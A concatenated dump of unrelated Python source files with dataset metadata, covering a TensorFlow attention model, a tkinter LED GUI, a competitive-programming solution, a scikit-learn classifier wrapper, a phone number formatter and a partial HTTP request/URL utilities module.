__call__(self,query,keys,values):\n '''\n 进行Bahdanau Attention操作\n :param query: 一个时刻t的query,我们一般使用解码器的某个时刻的hidden state,形状为[batch_size,query_dim]\n :param keys: 和query比较的keys, 一般使用编码器的全部输出,形状为[batch_size,max_time,keys_dim]\n :param values: 需要被attention的values,一般和key相同,你也可以使用自定的values,形状为[batch_size,max_time,values_dim]\n :return: 返回一个形状为[batch_size,max_time,1]的attention权重矩阵和形状为[batch_size,values_dim]的注意力向量\n '''\n query=tf.expand_dims(input=query,axis=1) #[batch_size,1,query_dim]\n logits_query=self.dense_w1(query) #[batch_size,1,hidden_units]\n\n logits_keys=self.dense_w2(keys) #[batch_size,max_time,hidden_units]\n\n logits=tf.nn.tanh(x=logits_query+logits_keys) #[batch_size,max_time,hidden_units]\n\n logits_v=self.dense_v(logits) #[batch_size,max_time,1]\n\n attention_weights=tf.nn.softmax(logits=logits_v,axis=1) #[batch_size,max_time,1]\n context_vector=tf.reduce_sum(input_tensor=attention_weights*values,axis=1) #[batch_size,values_dim]\n #print(\"context_vector:\", context_vector)\n return attention_weights,context_vector\n\n\n\nif __name__==\"__main__\":\n # query=tf.ones(shape=(20,100),dtype=tf.float32,name=\"query\")\n # print(\"query:\",query)\n #\n # keys=tf.ones(shape=(20,50,200),dtype=tf.float32,name=\"keys\")\n # print(\"keys:\",keys)\n #\n # attention_obj=BahdanauAttention(hidden_units=100)\n # attention_obj(query=query,keys=keys,values=keys)\n\n\n src_word_ids=np.array([[9,26,7,40],[7,24,6,100],[5,4,200,300],[5,4,200,300]])\n target_word_ids = np.array([[500, 26, 7, 40,10], [7, 24, 6, 100,0], [5, 4, 200, 300,80], [5, 4, 200, 300,90]])\n\n encoder=Encoder(vocab_size=5230,embeddings_dim=200,units=128,batch_size=30)\n en_outputs,en_states=encoder(word_ids=src_word_ids,mask=None,training=True)\n\n\n decoder=Decoder(vocab_size=62054,embeddings_dim=200,units=128,batch_size=30)\n word_ids_one_step=target_word_ids[:,0]\n print(\"word_ids_one_step:\\n\",word_ids_one_step)\n word_ids_one_step=np.expand_dims(a=word_ids_one_step,axis=-1)\n print(\"word_ids_one_step:\\n\",word_ids_one_step)\n\n\n decoder(word_ids=word_ids_one_step,pre_states=en_states,encoder_outputs=en_outputs)","sub_path":"Project/NeuralMachineTranslation/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"582697858","text":"#import tkinter as tk\nfrom tkinter import *\n\ndef formInterface(form):\n 'define form interface'\n frame = Frame(form, borderwidth=1, relief=GROOVE)\n \n label1 = Label(frame, text=\"LED 控制:\",font=(\"Helvetica\", 20))\n label1.pack(side=LEFT,padx=3,pady=3)\n \n buttonOn = Button(\n frame,\n text=\"ON\",\n font=(\"Helvetica\", 20),\n bg=\"GREEN\",\n padx=40,\n pady=20,\n command=buttonOn_Click\n )\n buttonOn.pack(side=LEFT, padx=3,pady=3)\n buttonOff = Button(\n frame,\n text=\"OFF\",\n font=(\"Helvetica\", 20),\n bg=\"RED\",\n padx=40,\n pady=20,\n command=buttonOff_Click\n )\n buttonOff.pack(side=LEFT, padx=3,pady=3)\n \n #textbox1 = Entry(frame, text=\"textbox(Entry)\")\n #textbox1.pack(padx=3,pady=3)\n \n #radioButton1 = Radiobutton(frame,text=\"radio button 1\")\n #radioButton1.pack(padx=3,pady=3)\n #radioButton2 = Radiobutton(frame,text=\"radio button 2\")\n #radioButton2.pack(padx=3,pady=3)\n \n frame.pack(padx=10,pady=10, fill=X)\n\ndef buttonOn_Click():\n print(\"ON 按下了\")\n\ndef buttonOff_Click():\n print(\"OFF 按下了\")\n\nif __name__ == '__main__':\n form = Tk()\n form.title('LED control')\n form.geometry(\"800x600\")\n form.option_add(\"*Button.Background\",\"#004A9B\")\n form.option_add(\"*Button.Foreground\",\"white\")\n formInterface(form)\n form.mainloop()\n\n\n","sub_path":"Python/LEDControl.py","file_name":"LEDControl.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"578150031","text":"from collections import deque\n\nH, W = map(int, input().split())\nA = [list(input()) for _ in range(H)]\n\nque = deque([(0, 0)])\nwhile que:\n h, w = que.popleft()\n\n A[h][w] = '?'\n\n if h == H - 1 and w == W - 1:\n break\n\n if h + 1 < H and A[h + 1][w] == '#':\n que.append((h + 1, w))\n continue\n\n if w + 1 < W and A[h][w + 1] == '#':\n que.append((h, w + 1))\n continue\n\ncnt = sum([a.count('#') for a in A])\nprint('Possible' if cnt == 0 else 'Impossible')\n","sub_path":"AtCoder/agc/007a_3.py","file_name":"007a_3.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"26139702","text":"from constants import *\n\nfrom sklearn.svm import SVC\nfrom xgboost import XGBClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\n\nfrom sklearn.model_selection import KFold, cross_val_score, GridSearchCV\nfrom sklearn.metrics import classification_report, f1_score, confusion_matrix\n\n\nclass Model:\n def __init__(self,\n test_x,\n test_y,\n cfg,\n train_x=None,\n train_y=None):\n self._fit_value = cfg['model']['fit_value']\n self._cfg = cfg['model']['fit_value']\n self._mode = cfg\n self._train_x = train_x\n self._train_y = train_y\n self._test_x = test_x\n self._test_y = test_y\n self._map_models = {'LogitReg': LogisticRegression,\n 'KNN': KNeighborsClassifier,\n 'LDA': LinearDiscriminantAnalysis,\n 'CART': DecisionTreeClassifier,\n 'SVM': SVC,\n 'XGB': XGBClassifier,\n 'RF': RandomForestClassifier}\n\n def choose_models(self):\n results = []\n names = []\n\n for name in self._map_models:\n model = self._map_models[name]\n k_fold = KFold(n_splits=self._fit_value['n_splits'],\n random_state=42,\n shuffle=True)\n cv_results = cross_val_score(estimator=model(),\n X=self._train_x,\n y=self._train_y,\n cv=k_fold,\n scoring='roc_auc')\n results.append(cv_results)\n names.append(name)\n logging.info('{}. Mean = {}, std = {}'.format(name,\n round(cv_results.mean(), 4),\n round(cv_results.std(), 3)))\n return results, names\n\n def train(self):\n\n params = self._fit_value['params']\n cls = self._map_models[self._fit_value['model']](**params)\n cls.fit(self._train_x, self._train_y)\n\n return cls\n\n def eval(self, cls, verbose=True):\n predicted = cls.predict(self._test_x)\n\n f1 = f1_score(self._test_y, predicted)\n conf_matrix = confusion_matrix(self._test_y, predicted)\n\n logging.info('F1 = {}'.format(f1))\n logging.info('CM = {}'.format(conf_matrix))\n if verbose:\n report = classification_report(self._test_y, predicted,\n output_dict=True)\n\n return report\n\n def grid_search(self, model, params):\n\n cls = self._map_models[model]\n grid = GridSearchCV(cls, params)\n grid.fit(self._train_x, self._train_y)\n return grid.best_estimator_, grid.best_params_\n","sub_path":"src/model/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"203302602","text":"def getInput():\n inputdata = input(\"Enter the mobile number: \")\n inputdata = inputdata.replace(\" \", \"\")\n\n while inputdata[0] != \"0\" or len(inputdata) != 11:\n inputdata = input(\"Enter the mobile number: \")\n inputdata = inputdata.replace(\" \", \"\")\n\n return inputdata\n\ndef formatNumber(phoneNumber):\n phoneNumber = phoneNumber[1:11]\n intNumber = \"+44 \" + phoneNumber[0:4] + \" \" + phoneNumber[4:10]\n print(intNumber)\n print(phoneNumber[0:4])\n print(phoneNumber[4:10])\n\n return intNumber\n\ndef Display(intNumber):\n print(\"Formatted number is: \" + intNumber)\n\nnum = formatNumber(getInput())\n\nDisplay(num)\n","sub_path":"6.3/6.3.py","file_name":"6.3.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"466689687","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals, division, print_function, absolute_import\nimport os\nimport urllib\nimport json\nimport types\nimport cgi\nimport re\nimport base64\nfrom BaseHTTPServer import BaseHTTPRequestHandler\nfrom functools import partial\nfrom wsgiref.headers import Headers as BaseHeaders\nfrom collections import Mapping, MutableSequence, Sequence\nimport itertools\nimport logging\nimport inspect\nimport copy\n\ntry:\n import urlparse\nexcept ImportError:\n from urllib import parse as urlparse\n\nfrom .decorators import _property\nfrom .utils import AcceptHeader, ByteString, MimeType\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Headers(BaseHeaders, Mapping):\n \"\"\"handles headers, see wsgiref.Headers link for method and use information\n\n Handles normalizing of header names, the problem with headers is they can\n be in many different forms and cases and stuff (eg, CONTENT_TYPE and Content-Type),\n so this handles normalizing the header names so you can request Content-Type\n or CONTENT_TYPE and get the same value.\n\n This has the same interface as Python's built-in wsgiref.Headers class but\n makes it even more dict-like and will return titled header names when iterated\n or anything (eg, Content-Type instead of all lowercase content-type)\n\n Here is the headers spec:\n https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html\n\n Here are the wsgiref class docs:\n https://docs.python.org/2/library/wsgiref.html#module-wsgiref.headers\n https://hg.python.org/cpython/file/2.7/Lib/wsgiref/headers.py\n \"\"\"\n @classmethod\n def normalize_name(cls, k):\n \"\"\"converts things like FOO_BAR to Foo-Bar which is the normal form\"\"\"\n klower = k.lower().replace('_', '-')\n bits = klower.split('-')\n return \"-\".join((bit.title() for bit in bits))\n\n def __init__(self, headers=None, **kwargs):\n super(Headers, self).__init__([])\n self.update(headers, **kwargs)\n\n def __setitem__(self, name, val):\n name = self.normalize_name(name)\n return super(Headers, self).__setitem__(name, val)\n\n def __delitem__(self, name):\n name = self.normalize_name(name)\n return super(Headers, self).__delitem__(name)\n\n def get_all(self, name):\n name = self.normalize_name(name)\n return super(Headers, self).get_all(name)\n\n def get(self, name, default=None):\n name = self.normalize_name(name)\n return super(Headers, self).get(name, default)\n\n def setdefault(self, name, val):\n name = self.normalize_name(name)\n return super(Headers, self).setdefault(name, val)\n\n def add_header(self, name, val, **params):\n name = self.normalize_name(name)\n return super(Headers, self).add_header(name, val, **params)\n\n def keys(self):\n return [self.normalize_name(k) for k, v in self._headers]\n\n def items(self):\n for k, v in self._headers:\n yield self.normalize_name(k), v\n\n def iteritems(self):\n return self.items()\n\n def iterkeys(self):\n for k in self.keys():\n yield k\n\n def __iter__(self):\n for k, v in self._headers:\n yield self.normalize_name(k)\n\n def pop(self, name, *args, **kwargs):\n val = self.get(name)\n if val is None:\n if args:\n val = args[0]\n elif \"default\" in kwargs:\n val = kwargs[\"default\"]\n else:\n raise KeyError(name)\n\n else:\n del self[name]\n\n return val\n\n def update(self, headers, **kwargs):\n if not headers: headers = {}\n if isinstance(headers, Mapping):\n headers.update(kwargs)\n headers = headers.items()\n\n else:\n if kwargs:\n headers = itertools.chain(\n headers,\n kwargs.items()\n )\n\n for k, v in headers:\n self[k] = v\n\n def copy(self):\n return self.__deepcopy__()\n\n def __deepcopy__(self):\n return type(self)(self._headers)\n\n\nclass RequestBody(object):\n \"\"\"this is the normalized request environment that every interface needs to\n conform to, it primarily acts like a wsgi environment, which is compatible with\n python's internal cgi.FieldStorage stuff\"\"\"\n\n # https://hg.python.org/cpython/file/2.7/Lib/cgi.py#l325\n\n def __init__(self, fp, headers, environ):\n self.headers = headers\n self.environ = environ\n self.fp = fp\n\n # make sure environ has the bare minimum to work\n for k in [\"REQUEST_METHOD\", \"QUERY_STRING\"]:\n if k not in self.environ:\n raise ValueError(\"environ dict does not contain {}\".format(k))\n\n def __iter__(self):\n body_fields = cgi.FieldStorage(\n fp=self.fp,\n headers=self.headers,\n environ=self.environ,\n keep_blank_values=True\n )\n\n for field_name in body_fields.keys():\n body_field = body_fields[field_name]\n if body_field.filename:\n yield field_name, body_field\n\n else:\n yield field_name, body_field.value\n\n\nclass ResponseBody(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, types.GeneratorType):\n return [x for x in obj]\n\n elif isinstance(obj, Exception):\n return {\n \"errmsg\": str(obj)\n }\n\n else:\n return json.JSONEncoder.default(self, obj)\n\n\nclass Url(str):\n \"\"\"a url object on steroids, this is here to make it easy to manipulate urls\n we try to map the supported fields to their urlparse equivalents, with some additions\n\n https://tools.ietf.org/html/rfc3986.html\n\n given a url http://user:pass@foo.com:1000/bar/che?baz=boom#anchor\n with a controller: Bar\n\n .scheme = http\n .netloc = user:pass@foo.com:1000\n .hostloc = foo.com:1000\n .hostname = foo.com\n .host = http://foo.com\n .port = 1000\n .base = http://user:pass@foo.com:1000/bar/che\n .fragment = anchor\n .anchor = fragment\n .uri = /bar/che?baz=boom#anchor\n .host(...) = httop://foo.com/...\n .base(...) = httop://foo.com/bar/che/...\n .controller(...) = httop://foo.com/bar/...\n \"\"\"\n encoding = \"utf-8\"\n\n scheme = \"http\"\n\n username = None\n\n password = None\n\n hostname = \"\"\n\n port = None\n\n netloc = \"\"\n\n path = \"\"\n\n query_kwargs = {}\n\n fragment = \"\"\n\n controller_path = \"\"\n\n @property\n def root(self):\n \"\"\"just return scheme://netloc\"\"\"\n return urlparse.urlunsplit((\n self.scheme,\n self.netloc,\n \"\",\n \"\",\n \"\"\n ))\n\n @property\n def anchor(self):\n \"\"\"alternative name for fragment\"\"\"\n return self.fragment\n\n @property\n def uri(self):\n \"\"\"return the uri, which is everything but base (no scheme, host, etc)\"\"\"\n uristring = self.path\n if self.query:\n uristring += \"?{}\".format(self.query)\n if self.fragment:\n uristring += \"#{}\".format(self.fragment)\n\n return uristring\n\n def __new__(cls, urlstring=None, **kwargs):\n parts = cls.merge(urlstring, **kwargs)\n urlstring = parts.pop(\"urlstring\")\n instance = super(Url, cls).__new__(cls, urlstring)\n for k, v in parts.items():\n setattr(instance, k, v)\n return instance\n\n @classmethod\n def keys(cls):\n keys = set(k for k, v in inspect.getmembers(cls) if not k.startswith(\"__\") and not callable(v))\n for dk in [\"encoding\", \"root\", \"anchor\", \"uri\"]:\n keys.discard(dk)\n return keys\n\n @classmethod\n def merge(cls, urlstring=\"\", **kwargs):\n # we handle port before any other because the port of host:port in hostname takes precedence\n # the port on the host would take precedence because proxies mean that the\n # host can be something:10000 and the port could be 9000 because 10000 is\n # being proxied to 9000 on the machine, but we want to automatically account\n # for things like that and then if custom behavior is needed then this method\n # can be overridden\n parts = {\n \"hostname\": cls.hostname,\n \"port\": cls.port,\n \"query_kwargs\": dict(cls.query_kwargs),\n \"controller_path\": cls.controller_path,\n \"scheme\": cls.scheme,\n \"netloc\": cls.netloc,\n \"path\": cls.path,\n \"fragment\": cls.fragment,\n \"username\": cls.username,\n \"password\": cls.password,\n }\n\n if urlstring:\n properties = [\n \"scheme\",\n \"netloc\",\n \"path\",\n \"fragment\",\n \"username\",\n \"password\",\n \"hostname\",\n \"port\",\n \"query\",\n ]\n\n o = urlparse.urlsplit(str(urlstring))\n if o.scheme and o.netloc: # full url \n for k in properties:\n v = getattr(o, k)\n parts[k] = v\n\n elif o.scheme and o.path: # no scheme: host/some/path\n # we need to better normalize to account for port\n hostname, path = urlstring.split(\"/\", 1)\n parts[\"hostname\"] = hostname\n if \"?\" in path:\n path, query = path.split(\"?\", 1)\n parts[\"path\"] = path\n parts[\"query\"] = query\n\n else:\n parts[\"path\"] = path\n\n else:\n parts[\"hostname\"] = o.path\n\n query = parts.get(\"query\", \"\")\n if query:\n parts[\"query_kwargs\"].update(cls.parse_query(query))\n\n query = kwargs.pop(\"query\", \"\")\n if query:\n parts[\"query_kwargs\"].update(cls.parse_query(query))\n\n query_kwargs = kwargs.pop(\"query_kwargs\", {})\n if query_kwargs:\n parts[\"query_kwargs\"].update(query_kwargs)\n\n parts[\"query\"] = \"\"\n if parts[\"query_kwargs\"]:\n parts[\"query\"] = cls.unparse_query(parts[\"query_kwargs\"])\n\n for k, v in kwargs.items():\n parts[k] = v\n\n common_ports = set([80, 443])\n domain, port = cls.split_hostname_from_port(parts[\"hostname\"])\n parts[\"hostname\"] = domain\n if port:\n parts[\"port\"] = kwargs.get(\"port\", port)\n\n if not parts.get(\"port\", None):\n if parts[\"scheme\"] == \"http\":\n parts[\"port\"] = 80\n elif parts[\"scheme\"] == \"https\":\n parts[\"port\"] = 443\n\n if not parts.get(\"hostloc\", \"\"):\n hostloc = parts[\"hostname\"]\n port = parts[\"port\"]\n if port and port not in common_ports:\n hostloc = '{}:{}'.format(hostloc, port)\n parts[\"hostloc\"] = hostloc\n\n if not parts.get(\"netloc\", \"\"):\n parts[\"netloc\"] = parts[\"hostloc\"]\n\n username = kwargs.get(\"username\", None)\n password = kwargs.get(\"password\", None)\n merge_netloc = username or password\n\n if merge_netloc:\n if not username: username = parts[\"username\"]\n if not password: password = parts[\"password\"]\n if username:\n parts[\"netloc\"] = \"{}:{}@{}\".format(\n kwargs.get(\"username\", parts[\"username\"]),\n password if password else \"\",\n parts[\"hostloc\"]\n )\n\n # we don't want common ports to be a part of a .geturl() call, but we do\n # want .port to return them\n if not merge_netloc:\n for common_port in common_ports:\n port_str = \":{}\".format(common_port)\n if parts[\"netloc\"].endswith(port_str):\n parts[\"netloc\"] = parts[\"netloc\"][:-len(port_str)]\n\n parts[\"path\"] = \"/\".join(cls.normalize_paths(parts[\"path\"]))\n\n parts[\"urlstring\"] = urlparse.urlunsplit((\n parts[\"scheme\"],\n parts[\"netloc\"],\n parts[\"path\"],\n parts[\"query\"],\n parts[\"fragment\"],\n ))\n\n for k in parts:\n if isinstance(parts[k], bytes):\n parts[k] = parts[k].decode(cls.encoding)\n\n if parts[\"port\"]:\n parts[\"port\"] = int(parts[\"port\"])\n\n return parts\n\n @classmethod\n def parse_query(cls, query):\n \"\"\"return name=val&name2=val2 strings into {name: val} dict\"\"\"\n if not query: return {}\n\n d = {}\n # https://docs.python.org/2/library/urlparse.html\n for k, kv in urlparse.parse_qs(query, True, strict_parsing=True).items():\n #k = k.rstrip(\"[]\") # strip out php type array designated variables\n if len(kv) > 1:\n d[k] = kv\n else:\n d[k] = kv[0]\n\n return d\n\n @classmethod\n def unparse_query(cls, query_kwargs):\n return urllib.urlencode(query_kwargs, doseq=True)\n\n @classmethod\n def normalize_paths(cls, *paths):\n args = []\n for ps in paths:\n if isinstance(ps, basestring):\n args.extend(filter(None, ps.split(\"/\")))\n #args.append(ps.strip(\"/\"))\n else:\n for p in ps:\n args.extend(cls.normalize_paths(p))\n return args\n\n def _normalize_params(self, *paths, **query_kwargs):\n \"\"\"a lot of the helper methods are very similar, this handles their arguments\"\"\"\n kwargs = {}\n\n if paths:\n fragment = paths[-1]\n if fragment:\n if fragment.startswith(\"#\"):\n kwargs[\"fragment\"] = fragment\n paths.pop(-1)\n\n kwargs[\"path\"] = \"/\".join(self.normalize_paths(*paths))\n\n kwargs[\"query_kwargs\"] = query_kwargs\n return kwargs\n\n @classmethod\n def split_hostname_from_port(cls, hostname):\n \"\"\"given a hostname:port return a tuple (hostname, port)\"\"\"\n bits = hostname.split(\":\", 2)\n p = None\n d = bits[0]\n if len(bits) == 2:\n p = int(bits[1])\n\n return d, p\n\n def create(self, *args, **kwargs):\n return type(self)(*args, **kwargs)\n\n def add(self, **kwargs):\n \"\"\"Just a shortcut to change the current url, equivalent to Url(self, **kwargs)\"\"\"\n if \"path\" in kwargs:\n if not kwargs[\"path\"][0].startswith(\"/\"):\n paths = self.normalize_paths(self.path, kwargs[\"path\"])\n else:\n paths = self.normalize_paths(kwargs[\"path\"])\n kwargs[\"path\"] = \"/\".join(paths)\n return self.create(self, **kwargs)\n\n def subtract(self, *paths, **kwargs):\n sub_kwargs = self.jsonable()\n\n path2 = self.normalize_paths(paths)\n path2.extend(self.normalize_paths(kwargs.pop(\"path\", \"\")))\n if path2:\n sub_path = self.normalize_paths(self.path)\n for p in path2:\n try:\n sub_path.remove(p)\n except ValueError:\n pass\n\n sub_kwargs[\"path\"] = sub_path\n\n for k, v in kwargs.items():\n if k == \"query_kwargs\":\n for qk, qv in kwargs[k].items():\n if str(sub_kwargs[k][qk]) == str(qv):\n sub_kwargs[k].pop(qk)\n\n else:\n if str(sub_kwargs[k]) == str(v):\n sub_kwargs.pop(k)\n\n return self.create(**sub_kwargs)\n\n def controller(self, *paths, **query_kwargs):\n \"\"\"create a new url object using the controller path as a base\n\n if you have a controller `foo.BarController` then this would create a new\n Url instance with `host/foo/bar` as the base path, so any *paths will be\n appended to `/foo/bar`\n\n :example:\n # controller foo.BarController\n\n print url # http://host.com/foo/bar/some_random_path\n\n print url.controller() # http://host.com/foo/bar\n print url.controller(\"che\", boom=\"bam\") # http://host/foo/bar/che?boom=bam\n\n :param *paths: list, the paths to append to the controller path\n :param **query_kwargs: dict, any query string params to add\n \"\"\"\n kwargs = self._normalize_params(*paths, **query_kwargs)\n if self.controller_path:\n if \"path\" in kwargs:\n paths = self.normalize_paths(self.controller_path, kwargs[\"path\"])\n kwargs[\"path\"] = \"/\".join(paths)\n else:\n kwargs[\"path\"] = self.controller_path\n return self.create(self.root, **kwargs)\n\n def base(self, *paths, **query_kwargs):\n \"\"\"create a new url object using the current base path as a base\n\n if you had requested /foo/bar, then this would append *paths and **query_kwargs\n to /foo/bar\n\n :example:\n # current path: /foo/bar\n\n print url # http://host.com/foo/bar\n\n print url.base() # http://host.com/foo/bar\n print url.base(\"che\", boom=\"bam\") # http://host/foo/bar/che?boom=bam\n\n :param *paths: list, the paths to append to the current path without query params\n :param **query_kwargs: dict, any query string params to add\n \"\"\"\n kwargs = self._normalize_params(*paths, **query_kwargs)\n if self.path:\n if \"path\" in kwargs:\n paths = self.normalize_paths(self.path, kwargs[\"path\"])\n kwargs[\"path\"] = \"/\".join(paths)\n else:\n kwargs[\"path\"] = self.path\n return self.create(self.root, **kwargs)\n\n def host(self, *paths, **query_kwargs):\n \"\"\"create a new url object using the host as a base\n\n if you had requested http://host/foo/bar, then this would append *paths and **query_kwargs\n to http://host\n\n :example:\n # current url: http://host/foo/bar\n\n print url # http://host.com/foo/bar\n\n print url.host_url() # http://host.com/\n print url.host_url(\"che\", boom=\"bam\") # http://host/che?boom=bam\n\n :param *paths: list, the paths to append to the current path without query params\n :param **query_kwargs: dict, any query string params to add\n \"\"\"\n kwargs = self._normalize_params(*paths, **query_kwargs)\n return self.create(self.root, **kwargs)\n\n def copy(self):\n return self.__deepcopy__()\n\n def __copy__(self):\n return self.__deepcopy__()\n\n def __deepcopy__(self, memodict={}):\n return self.create(\n scheme=self.scheme,\n username=self.username,\n password=self.password,\n hostname=self.hostname,\n port=self.port,\n path=self.path,\n query_kwargs=self.query_kwargs,\n fragment=self.fragment,\n controller_path=self.controller_path,\n )\n\n def __add__(self, other):\n ret = \"\"\n if isinstance(other, Mapping):\n ret = self.add(query_kwargs=other)\n\n elif isinstance(other, MutableSequence):\n ret = self.add(path=other)\n\n elif isinstance(other, basestring):\n ret = self.add(path=other)\n\n elif isinstance(other, Sequence):\n ret = self.add(path=other)\n\n else:\n raise ValueError(\"Not sure how to add {}\".format(type(other)))\n\n return ret\n __iadd__ = __add__\n\n def __truediv__(self, other):\n ret = \"\"\n if isinstance(other, MutableSequence):\n ret = self.add(path=other)\n\n elif isinstance(other, basestring):\n ret = self.add(path=other)\n\n elif isinstance(other, Sequence):\n ret = self.add(path=other)\n\n else:\n raise ValueError(\"Not sure how to add {}\".format(type(other)))\n\n return ret\n __itruediv__ = __truediv__\n\n def __sub__(self, other):\n \"\"\"Return a new url with other removed\"\"\"\n ret = \"\"\n if isinstance(other, Mapping):\n ret = self.subtract(query_kwargs=other)\n\n elif isinstance(other, MutableSequence):\n ret = self.subtract(path=other)\n\n elif isinstance(other, basestring):\n ret = self.subtract(path=other)\n\n elif isinstance(other, Sequence):\n ret = self.subtract(path=other)\n\n else:\n raise ValueError(\"Not sure how to add {}\".format(type(other)))\n\n return ret\n __isub__ = __sub__\n\n def jsonable(self):\n ret = {}\n for k in self.keys():\n v = getattr(self, k)\n if k == \"query_kwargs\":\n ret[k] = dict(v)\n else:\n ret[k] = v\n\n return ret\n\n\nclass Http(object):\n def __init__(self):\n self.headers = Headers()\n\n def has_header(self, header_name):\n \"\"\"return true if the header is set\"\"\"\n return header_name in self.headers\n\n def set_headers(self, headers):\n \"\"\"replace all headers with passed in headers\"\"\"\n self.headers = Headers(headers)\n\n def add_headers(self, headers, **kwargs):\n self.headers.update(headers, **kwargs)\n\n def set_header(self, header_name, val):\n self.headers[header_name] = val\n\n def add_header(self, header_name, val, **params):\n self.headers.add_header(header_name, val, **params)\n\n def get_header(self, header_name, default_val=None):\n \"\"\"try as hard as possible to get a a response header of header_name,\n rreturn default_val if it can't be found\"\"\"\n return self.headers.get(header_name, default_val)\n\n def _parse_query_str(self, query):\n \"\"\"return name=val&name2=val2 strings into {name: val} dict\"\"\"\n u = Url(query=query)\n return u.query_kwargs\n\n def _build_body_str(self, b):\n # we are returning the body, let's try and be smart about it and match content type\n ct = self.get_header('content-type')\n if ct:\n ct = ct.lower()\n if ct.rfind(\"json\") >= 0:\n if b:\n b = json.dumps(b)\n else:\n b = None\n\n elif ct.rfind(\"x-www-form-urlencoded\") >= 0:\n b = urllib.urlencode(b, doseq=True)\n\n return b\n\n def copy(self):\n \"\"\"nice handy wrapper around the deepcopy\"\"\"\n return copy.deepcopy(self)\n\n def __deepcopy__(self, memodict={}):\n instance = type(self)()\n for key, val in self.__dict__.items():\n #pout.v(key, val)\n if not key.startswith(\"_\"):\n if val is None:\n setattr(instance, key, val)\n\n else:\n if key == \"environ\":\n d = type(val)()\n for k, v in val.items():\n if k.lower() == \"wsgi.input\":\n d[k] = v\n else:\n d[k] = copy.deepcopy(v, memodict)\n\n setattr(instance, key, d)\n\n elif key == \"body_input\":\n setattr(instance, key, val)\n\n else:\n #setattr(instance, key, copy.deepcopy(val, memodict))\n try:\n setattr(instance, key, copy.deepcopy(val, memodict))\n except (AttributeError, TypeError):\n #except AttributeError:\n setattr(instance, key, copy.copy(val))\n\n return instance\n\n\nclass Request(Http):\n '''\n common interface that endpoints uses to decide what to do with the incoming request\n\n an instance of this class is used by the endpoints Call instance to decide where endpoints\n should route requests, so, many times, you'll need to write a glue function that takes however\n your request data is passed to Python and convert it into a Request instance that endpoints can\n understand\n\n properties --\n\n headers -- a dict of all the request headers in { header_name: header_val } format\n path -- the /path/part/of/the/url\n path_args -- tied to path, it's path, but divided by / so all the path bits are returned as a list\n query -- the ?name=val portion of a url\n query_kwargs -- tied to query, the values in query but converted to a dict {name: val}\n '''\n\n environ = None\n \"\"\"holds all the values that aren't considered headers but usually get passed with the request\"\"\"\n\n raw_request = None\n \"\"\"the original raw request that was filtered through one of the interfaces\"\"\"\n\n method = None\n \"\"\"the http method (GET, POST)\"\"\"\n\n body_input = None\n \"\"\"the request body input, if this is a POST request\"\"\"\n\n controller_info = None\n \"\"\"will hold the controller information for the request, populated from the Call\"\"\"\n\n @property\n def accept_encoding(self):\n \"\"\"The encoding the client requested the response to use\"\"\"\n # https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept-Charset\n ret = \"\"\n accept_encoding = self.get_header(\"Accept-Charset\", \"\")\n if accept_encoding:\n bits = re.split(r\"\\s+\", accept_encoding)\n bits = bits[0].split(\";\")\n ret = bits[0]\n return ret\n\n @_property\n def encoding(self):\n \"\"\"the character encoding of the request, usually only set in POST type requests\"\"\"\n encoding = None\n ct = self.get_header('content-type')\n if ct:\n ah = AcceptHeader(ct)\n if ah.media_types:\n encoding = ah.media_types[0][2].get(\"charset\", None)\n\n return encoding\n\n @property\n def access_token(self):\n \"\"\"return an Oauth 2.0 Bearer access token if it can be found\"\"\"\n access_token = self.get_auth_bearer()\n if not access_token:\n access_token = self.query_kwargs.get('access_token', '')\n if not access_token:\n access_token = self.body_kwargs.get('access_token', '')\n\n return access_token\n\n @property\n def client_tokens(self):\n \"\"\"try and get Oauth 2.0 client id and secret first from basic auth header,\n then from GET or POST parameters\n\n return -- tuple -- client_id, client_secret\n \"\"\"\n client_id, client_secret = self.get_auth_basic()\n if not client_id and not client_secret:\n client_id = self.query_kwargs.get('client_id', '')\n client_secret = self.query_kwargs.get('client_secret', '')\n if not client_id and not client_secret:\n client_id = self.body_kwargs.get('client_id', '')\n client_secret = self.body_kwargs.get('client_secret', '')\n\n return client_id, client_secret\n\n @_property(read_only=True)\n def ips(self):\n \"\"\"return all the possible ips of this request, this will include public and private ips\"\"\"\n r = []\n names = ['X_FORWARDED_FOR', 'CLIENT_IP', 'X_REAL_IP', 'X_FORWARDED', \n 'X_CLUSTER_CLIENT_IP', 'FORWARDED_FOR', 'FORWARDED', 'VIA',\n 'REMOTE_ADDR']\n\n for name in names:\n vs = self.get_header(name, '')\n if vs:\n r.extend(map(lambda v: v.strip(), vs.split(',')))\n\n vs = self.environ.get(name, '')\n if vs:\n r.extend(map(lambda v: v.strip(), vs.split(',')))\n\n return r\n\n @_property(read_only=True)\n def ip(self):\n \"\"\"return the public ip address\"\"\"\n r = ''\n\n # this was compiled from here:\n # https://github.com/un33k/django-ipware\n # http://www.ietf.org/rfc/rfc3330.txt (IPv4)\n # http://www.ietf.org/rfc/rfc5156.txt (IPv6)\n # https://en.wikipedia.org/wiki/Reserved_IP_addresses\n format_regex = re.compile(r'\\s')\n ip_regex = re.compile(r'^(?:{})'.format(r'|'.join([\n r'0\\.', # reserved for 'self-identification'\n r'10\\.', # class A\n r'169\\.254', # link local block\n r'172\\.(?:1[6-9]|2[0-9]|3[0-1])\\.', # class B\n r'192\\.0\\.2\\.', # documentation/examples\n r'192\\.168', # class C\n 